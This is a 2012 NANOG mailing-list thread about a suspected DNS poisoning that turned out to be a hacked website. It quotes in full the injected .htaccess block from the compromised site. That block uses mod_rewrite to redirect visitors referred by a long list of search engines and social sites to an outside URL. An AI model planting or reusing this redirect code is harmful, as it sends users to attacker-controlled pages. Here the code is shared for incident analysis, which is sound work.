No DNS poisoning at Google (in case of trouble, blame the DNS)

AP NANOG nanog at armoredpackets.com
Wed Jun 27 17:26:36 UTC 2012


On 6/27/12 12:51 PM, Matthew Black wrote:
> Ask and ye shall receive:
>
> # more .htaccess (backup copy)
>
> #c3284d#
> <IfModule mod_rewrite.c>
> RewriteEngine On
> RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|alt
> avista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysea
> rch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|d
> ogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel
> and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsea
> rchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|
> jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|l
> ive|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlse
> arch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|sea
> rchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|s
> uchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onlin
> e|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|
> westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
> RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]
> </IfModule>
> #/c3284d#
>
>            # # #
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
> -----Original Message-----
> From: Jason Hellenthal [mailto:jhellenthal at dataix.net]
> Sent: Wednesday, June 27, 2012 6:26 AM
> To: Arturo Servin
> Cc: nanog at nanog.org
> Subject: Re: No DNS poisoning at Google (in case of trouble, blame the DNS)
>
>
> What would be nice is the to see the contents of the htaccess file
> (obviously with sensitive information excluded)
>
> On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote:
>> It was not DNS issue, but it was a clear case on how community-support helped.
>>
>> Some of us may even learn some new tricks. :)
>>
>> Regards,
>> as
>>
>> Sent from mobile device. Excuse brevity and typos.
>>
>>
>> On 27 Jun 2012, at 05:07, Daniel Rohan <drohan at gmail.com> wrote:
>>
>>> On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer <bortzmeyer at nic.fr>wrote:
>>>
>>> What made you think it can be a DNS cache poisoning (a very rare
>>>> event, despite what the media say) when there are many much more
>>>> realistic possibilities (<troll>specially for a Web site written in
>>>> PHP</troll>)?
>>>>
>>>> What was the evidence pointing to a DNS problem?
>>>>
>>> It seems likely that he made a mistake in his analysis of the evidence.
>>> Something that could happen to anyone when operating outside of a comfort
>>> zone or having a bad day. Go easy.
>>>
>>> -DR
G' did they miss anyone in that list of referers :-)

Thanks for posting!

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